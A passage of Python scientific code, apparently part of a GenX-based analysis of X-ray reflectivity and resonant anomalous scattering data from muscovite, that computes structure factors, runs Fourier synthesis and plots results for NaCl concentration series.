'0_0':{'segment':[[0,20]],'info':[[2,2]]},'-1_0':{'segment':[[0,3],[3,9]],'info':[[6,-3],[2,-3]]},'0_-2':{'segment':[[0,9]],'info':[[2,-6.2782]]},\
'-2_-2':{'segment':[[0,9]],'info':[[2,-6.2782]]},'-2_-1':{'segment':[[0,3.1391],[3.1391,9]],'info':[[4,-3.1391],[2,-3.1391]]},'-2_0':{'segment':[[0,9]],'info':[[2,-6]]},\
'-2_1':{'segment':[[0,4.8609],[4.8609,9]],'info':[[4,-4.8609],[2,-6.8609]]},'-1_-1':{'segment':[[0,9]],'info':[[2,-4.1391]]},'-3_0':{'segment':[[0,1],[1,9]],'info':[[2,-1],[6,-1]]}}
bl_dl_muscovite={'0_0':{'segment':[[0,20]],'info':[[2,2]]}}
def generate_plot_files(output_file_path,sample,rgh,data,fit_mode, z_min=0,z_max=29,RAXR_HKL=[0,0,20],bl_dl=bl_dl_muscovite,height_offset=0,version=1,freeze=False):
plot_data_container_experiment={}
plot_data_container_model={}
plot_raxr_container_experiment={}
plot_raxr_container_model={}
A_list_Fourier_synthesis=[]
P_list_Fourier_synthesis=[]
HKL_list_raxr=[[],[],[]]
A_list_calculated,P_list_calculated,Q_list_calculated=sample.find_A_P_muscovite(h=RAXR_HKL[0],k=RAXR_HKL[1],l=RAXR_HKL[2])
i=0
for data_set in data:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
x = data_set.x
y = data_set.extra_data['Y']
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
if x[0]>100:
i+=1
A_key_list,P_key_list=[key for key in sample.domain['raxs_vars'].keys() if 'A'+str(i)+'_D' in key and 'set' not in key and 'get' not in key],[key for key in sample.domain['raxs_vars'].keys() if 'P'+str(i)+'_D' in key and 'set' not in key and 'get' not in key]
A_key_list.sort(),P_key_list.sort()
A_list_Fourier_synthesis.append(sample.domain['raxs_vars'][A_key_list[0]])
P_list_Fourier_synthesis.append(sample.domain['raxs_vars'][P_key_list[0]])
if not data_set.use:
A_list_Fourier_synthesis[-1]=0
q=np.pi*2*sample.unit_cell.abs_hkl(h,k,y)
rough = (1-rgh.beta)**2/(1+rgh.beta**2 - 2*rgh.beta*np.cos(q*sample.unit_cell.c*np.sin(np.pi-sample.unit_cell.beta)/2))
#try:
# exp_const,rgh.mu,re,auc=sample.domain['exp_factors']
# pre_factor=3e6*np.exp(-exp_const*rgh.mu/q)*(4*np.pi*re/auc)**2/q**2
#except:
# pre_factor=1
if version>=1.2:
exp_const,mu,re,auc,ra_conc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*rgh.mu/q)*(4*np.pi*re/auc)**2/q**2
elif version>=1.1:
exp_const,mu,re,auc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*rgh.mu/q)*(4*np.pi*re/auc)**2/q**2
else:
pre_factor=1
f=abs(sample.calculate_structure_factor(h,k,x,y,index=i,fit_mode=fit_mode,height_offset=height_offset,version=version))
f=rough*pre_factor*f*f
label=str(int(h[0]))+'_'+str(int(k[0]))+'_'+str(y[0])
plot_raxr_container_experiment[label]=np.concatenate((x[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis]),axis=1)
plot_raxr_container_model[label]=np.concatenate((x[:,np.newaxis],f[:,np.newaxis]),axis=1)
HKL_list_raxr[0].append(h[0])
HKL_list_raxr[1].append(k[0])
HKL_list_raxr[2].append(y[0])
else:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
l = data_set.x
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
#make dumy hkl and f to make the plot look smoother
if l[0]>0:
l_dumy=np.arange(0.22,l[-1]+0.1,0.1)
else:
l_dumy=np.arange(l[0],l[-1]+0.1,0.1)
N=len(l_dumy)
h_dumy=np.array([h[0]]*N)
k_dumy=np.array([k[0]]*N)
q_dumy=np.pi*2*sample.unit_cell.abs_hkl(h_dumy,k_dumy,l_dumy)
rough_dumy = (1-rgh.beta)**2/(1+rgh.beta**2 - 2*rgh.beta*np.cos(q_dumy*sample.unit_cell.c*np.sin(np.pi-sample.unit_cell.beta)/2))
q_data=np.pi*2*sample.unit_cell.abs_hkl(h,k,l)
LB_dumy=[]
dL_dumy=[]
f_dumy=[]
for j in range(N):
key=None
if l_dumy[j]>=0:
key=str(int(h[0]))+'_'+str(int(k[0]))
else:key=str(int(-h[0]))+'_'+str(int(-k[0]))
for ii in bl_dl[key]['segment']:
if abs(l_dumy[j])>=ii[0] and abs(l_dumy[j])<ii[1]:
n=bl_dl[key]['segment'].index(ii)
LB_dumy.append(bl_dl[key]['info'][n][1])
dL_dumy.append(bl_dl[key]['info'][n][0])
LB_dumy=np.array(LB_dumy)
dL_dumy=np.array(dL_dumy)
f_dumy=abs(sample.calculate_structure_factor(h_dumy,k_dumy,l_dumy,None,index=0,fit_mode=fit_mode,height_offset=height_offset,version=version))
#try:
# exp_const,mu,re,auc=sample.domain['exp_factors']
# pre_factor=3e6*np.exp(-exp_const*mu/q_dumy)*(4*np.pi*re/auc)**2/q_dumy**2
#except:
# pre_factor=1
if version>=1.2:
exp_const,mu,re,auc,ra_conc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*mu/q_dumy)*(4*np.pi*re/auc)**2/q_dumy**2
elif version>=1.1:
exp_const,mu,re,auc=sample.domain['exp_factors']
pre_factor=3e6*np.exp(-exp_const*mu/q_dumy)*(4*np.pi*re/auc)**2/q_dumy**2
else:
pre_factor=1
f_dumy=rough_dumy*pre_factor*f_dumy*f_dumy
c_projected_on_z=sample.unit_cell.vol()/(sample.unit_cell.a*sample.unit_cell.b*np.sin(sample.unit_cell.gamma))
f_ctr=lambda q:(q*np.sin(q*c_projected_on_z/4))**2
#f_ctr=lambda q:(np.sin(q*19.96/4))**2
f_dumy_norm=f_dumy*f_ctr(q_dumy)
label=str(int(h[0]))+str(int(k[0]))+'L'
plot_data_container_experiment[label]=np.concatenate((l[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis],(I*f_ctr(q_data))[:,np.newaxis],(eI*f_ctr(q_data))[:,np.newaxis]),axis=1)
plot_data_container_model[label]=np.concatenate((l_dumy[:,np.newaxis],f_dumy[:,np.newaxis],f_dumy_norm[:,np.newaxis]),axis=1)
Q_list_Fourier_synthesis=np.pi*2*sample.unit_cell.abs_hkl(np.array(HKL_list_raxr[0]),np.array(HKL_list_raxr[1]),np.array(HKL_list_raxr[2]))
A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=list(HKL_list_raxr[0]),k=list(HKL_list_raxr[1]),l=list(HKL_list_raxr[2]))
#A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=HKL_list_raxr[0][0],k=HKL_list_raxr[1][0],l=HKL_list_raxr[2][-1])
#dump CTR data and profiles
hkls=['00L']
plot_data_list=[]
for hkl in hkls:
plot_data_list.append([plot_data_container_experiment[hkl],plot_data_container_model[hkl]])
pickle.dump(plot_data_list,open(os.path.join(output_file_path,"temp_plot"),"wb"))
#dump raxr data and profiles
pickle.dump([plot_raxr_container_experiment,plot_raxr_container_model],open(os.path.join(output_file_path,"temp_plot_raxr"),"wb"))
pickle.dump([[A_list_calculated,P_list_calculated,Q_list_calculated],[A_list_Fourier_synthesis,P_list_Fourier_synthesis,Q_list_Fourier_synthesis]],open(os.path.join(output_file_path,"temp_plot_raxr_A_P_Q"),"wb"))
#dump electron density profiles
#e density based on model fitting
water_scaling=sample.plot_electron_density_muscovite(sample.domain,file_path=output_file_path,z_min=z_min,z_max=z_max,N_layered_water=100,height_offset=height_offset,version=version,freeze=freeze)#dumpt file name is "temp_plot_eden"
#e density based on Fourier synthesis
z_plot,eden_plot,eden_domains=sample.fourier_synthesis(np.array(HKL_list_raxr),np.array(P_list_Fourier_synthesis).transpose(),np.array(A_list_Fourier_synthesis).transpose(),z_min=z_min,z_max=z_max,resonant_el=sample.domain['el'],resolution=1000,water_scaling=water_scaling)
z_plot_sub,eden_plot_sub,eden_domains_sub=sample.fourier_synthesis(np.array(HKL_list_raxr),np.array(P_list_calculated_sub).transpose(),np.array(A_list_calculated_sub).transpose(),z_min=z_min,z_max=z_max,resonant_el=sample.domain['el'],resolution=1000,water_scaling=water_scaling)
#z_plot_sub,eden_plot_sub,eden_domains_sub=sample.fourier_synthesis(np.array([[HKL_list_raxr[0][0]]*100,[HKL_list_raxr[1][0]]*100,np.arange(0,HKL_list_raxr[2][-1],HKL_list_raxr[2][-1]/100.)]),np.array(P_list_calculated_sub).transpose(),np.array(A_list_calculated_sub).transpose(),z_min=z_min,z_max=z_max,resonant_el=sample.domain['el'],resolution=1000)
pickle.dump([z_plot,eden_plot,eden_domains],open(os.path.join(output_file_path,"temp_plot_eden_fourier_synthesis"),"wb"))
pickle.dump([z_plot_sub,eden_plot_sub,eden_domains_sub],open(os.path.join(output_file_path,"temp_plot_eden_fourier_synthesis_sub"),"wb"))
pickle.dump([water_scaling*0.25,water_scaling*0.75,water_scaling],open(os.path.join(output_file_path,"water_scaling"),"wb"))
#a function to make files to generate vtk files
def generate_plot_files_2(output_file_path,sample,rgh,data,fit_mode, z_min=0,z_max=29,RAXR_HKL=[0,0,20],bl_dl=bl_dl_muscovite,height_offset=0,tag=1):
plot_data_container_experiment={}
plot_data_container_model={}
plot_raxr_container_experiment={}
plot_raxr_container_model={}
A_list_Fourier_synthesis=[]
P_list_Fourier_synthesis=[]
HKL_list_raxr=[[],[],[]]
A_list_calculated,P_list_calculated,Q_list_calculated=sample.find_A_P_muscovite(h=RAXR_HKL[0],k=RAXR_HKL[1],l=RAXR_HKL[2])
i=0
for data_set in data:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
x = data_set.x
y = data_set.extra_data['Y']
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
if x[0]>100:
i+=1
A_key_list,P_key_list=[key for key in sample.domain['raxs_vars'].keys() if 'A'+str(i)+'_D' in key and 'set' not in key and 'get' not in key],[key for key in sample.domain['raxs_vars'].keys() if 'P'+str(i)+'_D' in key and 'set' not in key and 'get' not in key]
A_key_list.sort(),P_key_list.sort()
A_list_Fourier_synthesis.append(sample.domain['raxs_vars'][A_key_list[0]])
P_list_Fourier_synthesis.append(sample.domain['raxs_vars'][P_key_list[0]])
rough = (1-rgh.beta)/((1-rgh.beta)**2 + 4*rgh.beta*np.sin(np.pi*(y-LB)/dL)**2)**0.5
f=rough*abs(sample.calculate_structure_factor(h,k,x,y,index=i,fit_mode=fit_mode,height_offset=height_offset))
f=f*f
label=str(int(h[0]))+'_'+str(int(k[0]))+'_'+str(y[0])
plot_raxr_container_experiment[label]=np.concatenate((x[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis]),axis=1)
plot_raxr_container_model[label]=np.concatenate((x[:,np.newaxis],f[:,np.newaxis]),axis=1)
HKL_list_raxr[0].append(h[0])
HKL_list_raxr[1].append(k[0])
HKL_list_raxr[2].append(y[0])
else:
f=np.array([])
h = data_set.extra_data['h']
k = data_set.extra_data['k']
l = data_set.x
LB = data_set.extra_data['LB']
dL = data_set.extra_data['dL']
I=data_set.y
eI=data_set.error
#make dumy hkl and f to make the plot look smoother
if l[0]>0:
l_dumy=np.arange(0.05,l[-1]+0.1,0.1)
else:
l_dumy=np.arange(l[0],l[-1]+0.1,0.1)
N=len(l_dumy)
h_dumy=np.array([h[0]]*N)
k_dumy=np.array([k[0]]*N)
q_dumy=np.pi*2*sample.unit_cell.abs_hkl(h_dumy,k_dumy,l_dumy)
q_data=np.pi*2*sample.unit_cell.abs_hkl(h,k,l)
LB_dumy=[]
dL_dumy=[]
f_dumy=[]
for j in range(N):
key=None
if l_dumy[j]>=0:
key=str(int(h[0]))+'_'+str(int(k[0]))
else:key=str(int(-h[0]))+'_'+str(int(-k[0]))
for ii in bl_dl[key]['segment']:
if abs(l_dumy[j])>=ii[0] and abs(l_dumy[j])<ii[1]:
n=bl_dl[key]['segment'].index(ii)
LB_dumy.append(bl_dl[key]['info'][n][1])
dL_dumy.append(bl_dl[key]['info'][n][0])
LB_dumy=np.array(LB_dumy)
dL_dumy=np.array(dL_dumy)
rough_dumy = (1-rgh.beta)/((1-rgh.beta)**2 + 4*rgh.beta*np.sin(np.pi*(l_dumy-LB_dumy)/dL_dumy)**2)**0.5
f_dumy=rough_dumy*abs(sample.calculate_structure_factor(h_dumy,k_dumy,l_dumy,None,index=0,fit_mode=fit_mode,height_offset=height_offset))
f_dumy=f_dumy*f_dumy
c_projected_on_z=sample.unit_cell.c*np.sin(np.pi-sample.unit_cell.beta)
f_ctr=lambda q:(np.sin(q*c_projected_on_z/4))**2
#f_ctr=lambda q:(np.sin(q*19.96/4))**2
f_dumy_norm=f_dumy*f_ctr(q_dumy)
label=str(int(h[0]))+str(int(k[0]))+'L'
plot_data_container_experiment[label]=np.concatenate((l[:,np.newaxis],I[:,np.newaxis],eI[:,np.newaxis],(I*f_ctr(q_data))[:,np.newaxis],(eI*f_ctr(q_data))[:,np.newaxis]),axis=1)
plot_data_container_model[label]=np.concatenate((l_dumy[:,np.newaxis],f_dumy[:,np.newaxis],f_dumy_norm[:,np.newaxis]),axis=1)
Q_list_Fourier_synthesis=np.pi*2*sample.unit_cell.abs_hkl(np.array(HKL_list_raxr[0]),np.array(HKL_list_raxr[1]),np.array(HKL_list_raxr[2]))
A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=list(HKL_list_raxr[0]),k=list(HKL_list_raxr[1]),l=list(HKL_list_raxr[2]))
#A_list_calculated_sub,P_list_calculated_sub,Q_list_calculated_sub=sample.find_A_P_muscovite(h=HKL_list_raxr[0][0],k=HKL_list_raxr[1][0],l=HKL_list_raxr[2][-1])
#output files
#CTR
np.savetxt('D://temp_CTR'+str(tag),plot_data_container_model['00L'])
#RAXR
keys=plot_raxr_container_model.keys()
keys.sort()
np.savetxt('D://temp_RAXR'+str(tag),plot_raxr_container_model[keys[0]])
#Fourier components
#print A_list_calculated
ap_data=np.concatenate((A_list_calculated[:,np.newaxis],P_list_calculated[:,np.newaxis],Q_list_calculated[:,np.newaxis]),axis=1)
np.savetxt('D://temp_APQ'+str(tag),ap_data)
#this function must be called within the shell of GenX gui and par_instance=model.parameters,dump_file='D://temp_plot_raxr_A_P_Q' by default
#The purpose of this function is to append the errors of A and P extracted from the errors displaying inside the tab of GenX gui
#copy and past this command line to the shell for action:
#model.script_module.create_plots.append_errors_for_A_P(par_instance=model.parameters,dump_file='D://temp_plot_raxr_A_P_Q',raxs_rgh='rgh_raxs')
def append_errors_for_A_P_original(par_instance,dump_file='D://temp_plot_raxr_A_P_Q',raxs_rgh='rgh_raxs'):
data_AP_Q=pickle.load(open(dump_file,"rb"))
AP_calculated=data_AP_Q[0]
A_model_fit,P_model_fit=data_AP_Q[1][0],data_AP_Q[1][1]
A_error_model_fit,P_error_model_fit=[],[]
table=np.array(par_instance.data)
for i in range(len(A_model_fit)):
A_error_model_fit_domain=[]
for j in range(len(A_model_fit[i])):
par_name=raxs_rgh+'.setA'+str(i+1)+'_D'+str(j+1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
A_error_model_fit_domain.append(error)
else:
A_error_model_fit_domain.append(np.array([0.1,0.1]))
A_error_model_fit.append(A_error_model_fit_domain)
for i in range(len(P_model_fit)):
P_error_model_fit_domain=[]
for j in range(len(P_model_fit[i])):
par_name=raxs_rgh+'.setP'+str(i+1)+'_D'+str(j+1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
P_error_model_fit_domain.append(error)
else:
P_error_model_fit_domain.append(np.array([0.1,0.1]))
P_error_model_fit.append(P_error_model_fit_domain)
dump_data=[[AP_calculated[0],AP_calculated[1],AP_calculated[2]],[data_AP_Q[1][0],data_AP_Q[1][1],data_AP_Q[1][2],A_error_model_fit,P_error_model_fit]]
pickle.dump(dump_data,open(dump_file,"wb"))
def append_errors_for_A_P(par_instance,dump_file='D://temp_plot_raxr_A_P_Q',raxs_rgh='rgh_raxs'):
data_AP_Q=pickle.load(open(dump_file,"rb"))
AP_calculated=data_AP_Q[0]
A_model_fit,P_model_fit=data_AP_Q[1][0],data_AP_Q[1][1]
A_error_model_fit,P_error_model_fit=[],[]
table=np.array(par_instance.data)
for i in range(len(A_model_fit)):
par_name=raxs_rgh+'.setA'+str(i+1)+'_D'+str(1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
A_error_model_fit.append(error)
else:
A_error_model_fit.append(np.array([0.1,0.1]))
for i in range(len(P_model_fit)):
par_name=raxs_rgh+'.setP'+str(i+1)+'_D'+str(1)
for k in range(len(table)):
if table[k][0]==par_name:
if table[k][5][0]=='(' and table[k][5][-1]==')':
error=[abs(eval(table[k][5])[0]),abs(eval(table[k][5])[1])]
P_error_model_fit.append(error)
else:
P_error_model_fit.append(np.array([0.1,0.1]))
dump_data=[[AP_calculated[0],AP_calculated[1],AP_calculated[2]],[data_AP_Q[1][0],data_AP_Q[1][1],data_AP_Q[1][2],A_error_model_fit,P_error_model_fit]]
pickle.dump(dump_data,open(dump_file,"wb"))
def plotting_raxr_new(data,savefile="D://raxr_temp.png",color=['b','r'],marker=['o']):
experiment_data,model=data[0],data[1]
labels=model.keys()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
#labels.sort()
fig=pyplot.figure(figsize=(15,len(labels)/3))
for i in range(len(labels)):
rows=None
if len(labels)%3==0:
rows=len(labels)/3
else:
rows=len(labels)/3+1
ax=fig.add_subplot(rows,3,i+1)
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1],marker=marker[0],s=15,c=color[0],edgecolors=color[0],label="data points")
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1],yerr=experiment_data[labels[i]][:,2],fmt=None,color=color[0])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1],color=color[1],lw=3,label='model profile')
if i!=len(labels)-1:
ax.set_xticklabels([])
pyplot.xlabel('')
else:
pyplot.xlabel('Energy (kev)',axes=ax,fontsize=12)
pyplot.ylabel('|F|',axes=ax,fontsize=12)
pyplot.title(labels[i])
fig.tight_layout()
fig.savefig(savefile,dpi=300)
return fig
def plotting_raxr_multiple(file_head=module_path_locator(),dump_files=['temp_plot_raxr_0NaCl','temp_plot_raxr_1NaCl','temp_plot_raxr_10NaCl','temp_plot_raxr_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],number=9,color_type=1,marker=['o']):
color=set_color(len(dump_files),color_type)
datas=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=(15,10))
for i in range(number):
ax=fig.add_subplot(3,3,i+1)
for j in range(len(datas)):
data=datas[j]
experiment_data,model=data[0],data[1]
labels=model.keys()
labels.sort()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
labels_comp=datas[0][1].keys()
labels_comp.sort()
offset=model[labels[i]][:,1][0]-datas[0][1][labels_comp[i]][:,1][0]-j*0.2#arbitrary offset between datasets
#print labels[i],offset
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,marker=marker[0],s=15,c=color[j],edgecolors=color[j],label=label_marks[j])
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,yerr=experiment_data[labels[i]][:,2],fmt=None,ecolor=color[j])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1]-offset,color=color[j],lw=1.5)
if i in [6,7,8]:
pyplot.xlabel('Energy (ev)',axes=ax,fontsize=12)
if i in [0,3,6]:
pyplot.ylabel('|F|',axes=ax,fontsize=12)
if j==0:
pyplot.title(labels[i],size=12)
if i==0:
ax.legend(loc=2,ncol=2,prop={'size':12})
pyplot.ylim((1.5,3.5))
pyplot.subplots_adjust(wspace=0.2, hspace=None)
#fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plotting_raxr_multiple_2(file_head=module_path_locator(),dump_files=['temp_plot_raxr_0NaCl','temp_plot_raxr_1NaCl','temp_plot_raxr_10NaCl','temp_plot_raxr_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],number_raxr=[0,1,6],color_type=1,marker=['o'],plot_layout=[3,1],fig_size=(4.5,6)):
color=set_color(len(dump_files),color_type)
datas=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=fig_size)
scale=0.3141#q=scale*L, scale=2pi/d[001]
number=None
if type(number_raxr)==type(1):
number=range(number_raxr)
else:
number=number_raxr
for i in number:
ax=fig.add_subplot(plot_layout[0],plot_layout[1],number.index(i)+1)
for j in range(len(datas)):
data=datas[j]
experiment_data,model=data[0],data[1]
labels=model.keys()
labels.sort()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
labels_title=map(lambda x:"q="+str(x)+r'$\rm{\ \AA^{-1}}$',np.round(np.array(label_tag)*scale,3))
#labels=map(lambda x:str(x),list(np.array(label_tag)*scale))
labels_comp=datas[0][1].keys()
labels_comp.sort()
offset=model[labels[i]][:,1][0]-datas[0][1][labels_comp[i]][:,1][0]-j*0.15#arbitrary offset between datasets
#print labels[i],offset
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,marker=marker[0],s=15,c=color[j],edgecolors=color[j],label=label_marks[j])
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,yerr=experiment_data[labels[i]][:,2],fmt=None,ecolor=color[j])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1]-offset,color=color[j],lw=1.5)
pyplot.ylabel(r'|F|',axes=ax,fontsize=12)
if i!=number[-1]:
ax.get_xaxis().set_ticks([])
if i == number[-1]:
pyplot.xlabel(r'Energy (ev)',axes=ax,fontsize=12)
if j==0:
pyplot.title(labels_title[i],size=12)
#if i==0:
# ax.legend(loc=2,ncol=2,prop={'size':12})
# pyplot.ylim((1.5,3.5))
pyplot.subplots_adjust(wspace=0.2, hspace=None)
#fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plotting_raxr_multiple_full_set(file_head=module_path_locator(),dump_files=['temp_plot_raxr_0NaCl','temp_plot_raxr_1NaCl','temp_plot_raxr_10NaCl','temp_plot_raxr_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],number_raxr=range(9),color_type=1,marker=['o'],plot_layout=[3,3],fig_size=(12,8)):
color=set_color(len(dump_files),color_type)
datas=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=fig_size)
scale=0.3141#q=scale*L, scale=2pi/d[001]
number=None
if type(number_raxr)==type(1):
number=range(number_raxr)
else:
number=number_raxr
for i in number:
ax=fig.add_subplot(plot_layout[0],plot_layout[1],number.index(i)+1)
for j in range(len(datas)):
data=datas[j]
experiment_data,model=data[0],data[1]
labels=model.keys()
labels.sort()
label_tag=map(lambda x:float(x.split("_")[-1]),labels)
label_tag.sort()
labels=map(lambda x:"0_0_"+str(x),label_tag)
labels_title=map(lambda x:"q="+str(x)+r'$\rm{\ \AA^{-1}}$',np.round(np.array(label_tag)*scale,3))
#labels=map(lambda x:str(x),list(np.array(label_tag)*scale))
labels_comp=datas[0][1].keys()
labels_comp.sort()
offset=model[labels[i]][:,1][0]-datas[0][1][labels_comp[i]][:,1][0]-j*0.15#arbitrary offset between datasets
#print labels[i],offset
ax.scatter(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,marker=marker[0],s=15,c=color[j],edgecolors=color[j],label=label_marks[j])
ax.errorbar(experiment_data[labels[i]][:,0],experiment_data[labels[i]][:,1]-offset,yerr=experiment_data[labels[i]][:,2],fmt=None,ecolor=color[j])
ax.plot(model[labels[i]][:,0],model[labels[i]][:,1]-offset,color=color[j],lw=1.5)
if number.index(i) in [0,3,6]:
pyplot.ylabel(r'|F|',axes=ax,fontsize=12)
if number.index(i) not in [6,7,8]:
ax.get_xaxis().set_ticks([])
if number.index(i) in [6,7,8]:
pyplot.xlabel(r'Energy (ev)',axes=ax,fontsize=12)
if j==0:
pyplot.title(labels_title[i],size=12)
#if i==0:
# ax.legend(loc=2,ncol=2,prop={'size':12})
# pyplot.ylim((1.5,3.5))
pyplot.subplots_adjust(wspace=0.2, hspace=None)
#fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plot_CTR_multiple_model_muscovite(file_head=module_path_locator(),dump_files=['temp_plot_0NaCl','temp_plot_1NaCl','temp_plot_10NaCl','temp_plot_100NaCl'],labels=['0NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],markers=['.']*20,fontsize=16,lw=1.5,color_type=1):
colors=set_color(len(dump_files)*2,color_type)
objects=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=(10,8))
ax=fig.add_subplot(2,1,1)
ax.set_yscale('log')
scale=0.3141
for i in range(len(objects)):
object=objects[i][0]
ax.scatter(object[0][:,0]*scale,object[0][:,1]*(10**i),marker=markers[i],s=20,facecolors='none',edgecolors=colors[i],label='Data_'+labels[i])
ax.errorbar(object[0][:,0]*scale,object[0][:,1]*(10**i),yerr=object[0][:,2],fmt=None,ecolor=colors[i])
l,=ax.plot(object[1][:,0]*scale,object[1][:,1]*(10**i),color=colors[i],lw=lw,label='Model_'+labels[i])
#l.set_dashes(l_dashes[i])
#pyplot.xlabel('L(r.l.u)',axes=ax,fontsize=fontsize)
pyplot.ylabel(r'$\rm{|F_{HKL}|}$',axes=ax,fontsize=fontsize)
pyplot.title('(00L)',weight=4,size=fontsize,clip_on=True)
ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
ax.plot([0.4,0.4],[0,10000],'--',color='black')
ax.plot([0.9,0.9],[0,10000],'--',color='black')
pyplot.xlim((-2*scale,30*scale))
ax=fig.add_subplot(2,1,2)
ax.set_yscale('log')
for i in range(len(objects)):
object=objects[i][0]
ax.scatter(object[0][:,0]*scale,object[0][:,3]*(10**i),marker=markers[i],s=20,facecolors='none',edgecolors=colors[i],label='Data_'+labels[i])
ax.errorbar(object[0][:,0]*scale,object[0][:,3]*(10**i),yerr=object[0][:,4],fmt=None,ecolor=colors[i])
l,=ax.plot(object[1][:,0]*scale,object[1][:,2]*(10**i),color=colors[i],lw=lw,label='Model_'+labels[i])
#l.set_dashes(l_dashes[i])
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$',axes=ax,fontsize=fontsize)
pyplot.ylabel(r'$\rm{|normalized\ F_{HKL}|}$',axes=ax,fontsize=fontsize)
#pyplot.title('(00L)',weight=4,size=10,clip_on=True)
ax.plot([0.4,0.4],[0,10000],'--',color='black')
ax.plot([0.9,0.9],[0,10000],'--',color='black')
#ax.plot([2.92*scale,2.92*scale],[0,10000],'--',color='black')
ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
pyplot.xlim((-2*scale,30*scale))
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_ctrs.png'),dpi=300)
return fig
def plot_CTR_multiple_model_muscovite_2(file_head=module_path_locator(),dump_files=['temp_plot_0NaCl','temp_plot_1NaCl','temp_plot_10NaCl','temp_plot_100NaCl'],labels=['0NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],markers=['.']*20,fontsize=12,lw=1.5,color_type=1):
colors=set_color(len(dump_files)*2,color_type)
objects=[pickle.load(open(os.path.join(file_head,file))) for file in dump_files]
fig=pyplot.figure(figsize=(5,4))
ax=fig.add_subplot(1,1,1)
ax.set_yscale('log')
scale=0.3141#q=scale*L, scale=2pi/d[001]
for i in range(len(objects)):
object=objects[i][0]
ax.scatter(object[0][:,0]*scale,object[0][:,1]*(10**i),marker=markers[i],s=20,facecolors='none',edgecolors=colors[i],label='Data_'+labels[i])
ax.errorbar(object[0][:,0]*scale,object[0][:,1]*(10**i),yerr=object[0][:,2],fmt=None,ecolor=colors[i])
l,=ax.plot(object[1][:,0]*scale,object[1][:,1]*(10**i),color=colors[i],lw=lw,label='Model_'+labels[i])
#l.set_dashes(l_dashes[i])
#pyplot.xlabel('L(r.l.u)',axes=ax,fontsize=fontsize)
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$',axes=ax,fontsize=fontsize)
pyplot.ylabel(r'$\rm{|F_{HKL}|}$',axes=ax,fontsize=fontsize)
#pyplot.title('(00L)',weight=4,size=fontsize,clip_on=True)
#ax.legend(prop={'size':fontsize})
